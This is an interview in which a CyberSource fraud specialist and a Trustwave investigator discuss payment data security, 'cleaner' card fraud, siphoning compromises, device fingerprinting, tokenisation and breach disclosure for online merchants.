What are the key points that you have discussed at the MRC conference?
Akif Khan, CyberSource: The main objective of our presentation was to educate merchants on the strategies they can use to help protect sensitive payment data. Together with Trustwave, I elaborated on some of the key findings from our recent payment security survey, including key challenges and trends. We’d like to help merchants evaluate their current payment security thinking and benchmark their practices against peers, whilst also offering practical advice on areas of improvement.
Ryan Jones, Trustwave: I added my perspective around the findings of the report and will be applying case studies from data compromises I have personally investigated.
As far as the adoption of online fraud measures/sophisticated security systems is concerned, where do you think the main challenges come from?
Akif Khan, CyberSource: One of the main concerns we have seen from merchants relates to storing, protecting and securing their payment data. Interestingly there’s been a lot of focus on external threats, but the internal threats can pose just as significant a concern. Indeed, our recent payment security survey highlighted that just as many merchants perceived employees to be a security threat as hackers. Within an organisation, payment fraud data is exposed at many points in the order management process, from sales to the back-office. This must be addressed.
Ryan Jones, Trustwave: One of the key challenges is managing the current authentication and payments infrastructure in place. If a payments infrastructure was designed today with large budgets from scratch it would contain far stronger authentication and risk related information than the systems available to merchants today. However, this is not possible and we must ensure that the payment systems stay functional during security improvements. This balance of improvements with the necessary backwards compatibility poses real challenges for the industry as a whole.
The other key challenge is customer buy in and as a consequence, customer adoption. There are plenty of systems which could be rolled out to reduce fraud but if it takes a commuter ten minutes to purchase a cappuccino then there is very little chance of adoption. The balance must be struck and it can be hard to convince consumers that the problem is with the consumer side of the arrangement when there are high profile information security compromises.
Cybercrime has become a rapidly growing phenomenon over recent years. In your opinion, where should mitigation efforts be focused and what can corporate and federal authorities do to slow down cybercrime?
Akif Khan, CyberSource: As Detective Superintendent Charlie McMurdie of the Police Central eCrime Unit (PCeU) reported in CyberSource’s 2011 UK Online Fraud Report, collaboration is key. In partnering with the likes of Europol and the Serious Organised Crime Agency (SOCA), they are able to share resources, intelligence and expertise. This, combined with the intelligence provided by businesses on suspected fraudsters, has helped enable the PCeU to identify and prosecute those responsible.
The multi-geographical nature of e-crime and its crossover with traditional crime means that it remains difficult to quantify. As such it is important to develop better methods of measuring and reporting such crimes to provide a more accurate picture of their impact. In doing so, we can better address the cybercrime challenge.
Ryan Jones, Trustwave: In order to operate in the modern world and take advantage of emerging technologies customers must share sensitive information with a vast number of organisations including companies and government departments. Some of the common data used for authentication is impossible to change (e.g. date of birth, government identification numbers and biometric information) and many other pieces of data are very difficult to change (e.g. address, telephone number, bank account number).
This approach of having your sensitive information, which is very difficult to change, stored in hundreds or thousands of databases worldwide, is vulnerability. This is because if only one database is compromised the number of databases with your information increases the likelihood of your data being compromised.
As an industry we must develop technologies which allow us to authenticate our identities in both the online and offline worlds whist reducing the value of this information. The more we authenticate with the same static information the higher the risk. The tools for these authentication mechanisms have existed for years. The challenge is bringing these mechanisms to the public in a palatable and cost effective way.
Much of the recent discussion in online retail has been around fraud prevention. What are the existing criminal trends related to card fraud and how can ID protection vendors mitigate them?
Akif Khan, CyberSource: Merchants report that they are increasingly seeing ‘cleaner fraud’—these are bad transactions which are hard to differentiate from good transactions, perpetrated by today’s most sophisticated fraudsters. To combat this level of fraud requires the latest anti-fraud tools. Merchants can, for example, utilise solutions that leverage device fingerprinting technology. How does this help? Well, many fraudsters place multiple orders from the same laptop, using different names, addresses and card numbers; using device fingerprinting they will know that all orders came from the same device, alerting them to the fraud attempt. Such tools should of course be used as part of a multi-pronged approach.
Ryan Jones, Trustwave: From a data gathering standpoint, in recent years we have seen a move from “smash and grab” compromises to “siphoning” compromises. “Smash and grab” compromises involved an attacker breaching the information security defenses of a system and then taking a copy of all the sensitive data in the database. The attack could be over in an hour and all the data has gone. Now we are seeing more “siphoning” compromises where each transaction, as it is processed, is saved and sent to a fraudster. There are two main reasons for this change in approach. The first is that the message is getting through – only store what you need – there are now less databases full of sensitive data. However, there is an advantage to the “siphoning” method for fraudsters; data languishing in a database goes stale – the data inserted 3 years ago is often incorrect and useless for fraudsters. If the fraudsters capture the data as it is processed it is “fresh” and the data is known to be valid.
To counter this there is pressure on companies to completely outsource this process of data collection to a third party who can devote the necessary resources to security. However, once this is done the company is often under no pressure to implement security controls internally. This can still leave a website vulnerable. An attacker could compromise the site and change the code so that instead of redirecting the customer to the legitimate payment service provider it is to an attackers site. This site collects the data then forwards it on to the legitimate provider so the payment goes through as expected butthen also saves the data for fraud purposes. This is where I believe a new technical fraud battleground will develop.
What are the key trends in e-commerce and related fraud? Are they the same in all regions?
Akif Khan, CyberSource: eCommerce is evolving way beyond web commerce. Today there are many more potential customer touch points: mobile, apps, social media, interactive TV and more. This approach has its challenges: silo’d systems, inconsistent user experiences, and costly parallel operations. Now that the various channels (such as smartphones, tablets, social networks, etc.) for eCommerce are more established, companies should consider a more consistent approach to unify these channels around a single infrastructure.
The same philosophy applies to fraud management, with today’s businesses requiring systems that works across multiple channels and geographies, are tailored for specific sectors and offer unified reporting.
Beefing up security for online card transactions via more authentication requirements seems to be an appropriate solution against online fraud, but if introduced, what are the effects on merchants/consumers attitude towards the online transaction process? Does the advent of new, simple and affordable technologies increase the threat of fraudulent activities? Will anti-fraud measures be able to keep up with improvements in technology?
Akif Khan, CyberSource: It’s clear that consumers are becoming increasingly savvy online; many are demanding some form of proof of security before proceeding with an online transaction.
Three quarters of those surveyed by McAfee said they would choose sites with trustmarks over those without, and four in ten online consumers claimed they would spend more online if they had a visual guarantee of security (i.e. SSL, padlock symbols, trustmarks etc.). Merchants should thus look to provide a consistent, robust and trustworthy online payment mechanism that meets consumers’ demands. That said, it’s worth noting that customer sentiment towards online security needs to be balanced against their desire to get through the payment process quickly and easily.
Much has been written about the potential impact cybercrime (in its various forms) could have on consumers, but online businesses are just as vulnerable to being targeted by fraudsters. In this context, what measures should businesses implement to respond effectively to the growing exploitation of the internet by organized criminals?
Akif Khan, CyberSource: The biggest impact for merchants is the impact it has on consumers. In today’s highly competitive environment, brand and reputation are everything. Not surprisingly, the very public data breach incidents can be extremely damaging.
From a payment security perspective, my view is that merchants can help protect themselves by not storing, handling or touching sensitive payment data. In utilising a tokenisation system, merchants can still offer their customers a seamless shopping experience, yet they don’t need to store any of the payment data.
From a fraud perspective, it is vital to address the challenge of cleaner fraud. Today’s organised gangs are very sophisticated, and operate across multiple geographies and sectors. To address the challenge, merchants should firstly utilise the latest anti-fraud tools. Secondly, data is key. Organised crime has no boundaries, so merchants should strive to use solutions that allow them to benefit from global transaction databases—such systems analyse suspicious transactions across multiple organisations, not just the merchant’s own business.
Ryan Jones, Trustwave: Businesses often play two roles with fraudulent use of data. The first is that it holds sensitive data which can be compromised. Then this information is often provided to another company in order to defraud. The first company with poor information security controls often suffers very little damage; if the data compromise is not made public then a small amount of internal cleanup is often enough to contain the problem. However, it is the second, defrauded company which bears the brunt of the compromised company’s weak security.
It is important that as an industry we recognise the importance of not just the last step of the fraudsters – the fraud itself – but we address all the steps of the fraud. Without the sensitive data in the first place it wouldn’t be possible to defraud the merchants.
Giving compromised merchants the right forum to disclose any information security breaches and allowing this to occur without intense negative repercussions for the discloser could give us the tools we need to address the attempts at fraud. By marrying the known compromised data with the actions of attackers we can vastly improve our fraud tracking and blocking mechanisms.
The future of fraud prevention will largely depend on …
Akif Khan, CyberSource: …how we respond to the rapidly evolving nature of eCommerce. I see convergence being driven at the back-end and divergence at the front-end, courtesy of the many touch points that consumers now have with merchants. My role is to take the complexity out of such evolution, offering businesses a simple, secure and unified way of growing their eCommerce operations, irrespective of channel, geography and sector.
Ryan Jones, Trustwave: …all parties, once incentivised to do so, pulling in the same direction. We must ensure that as an industry:• Compromised data is disclosed to enable fraud reduction action to be taken• Ensure that data which is used for authentication can be devalued• Ensure that we minimise loopholes driven by the need for backwards compatibilityThis means:• Building a platform for knowledge sharing• Reducing the stigma of a data compromise – Data compromise disclosure laws do a great job of this• Redesigning our authentication systems to not be based on shared ‘secrets’ which must be shared with hundreds of organisations.• Redesigning our authentication systems so that authentication information can be revoked when compromised• Minimising the trust given to depreciated methods of authentication
Every day we send out a free e-mail with the most important headlines of the last 24 hours.
Subscribe now